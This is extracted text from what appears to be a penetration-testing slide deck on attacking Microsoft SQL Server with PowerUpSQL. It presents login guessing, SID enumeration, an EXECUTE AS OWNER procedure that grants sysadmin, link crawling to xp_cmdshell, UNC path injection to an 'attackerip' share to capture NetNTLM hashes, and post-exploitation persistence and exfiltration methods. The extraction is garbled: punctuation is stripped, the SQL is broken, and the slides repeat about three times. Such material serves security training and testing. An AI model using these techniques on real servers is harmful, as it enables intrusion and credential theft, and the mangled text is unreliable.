Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
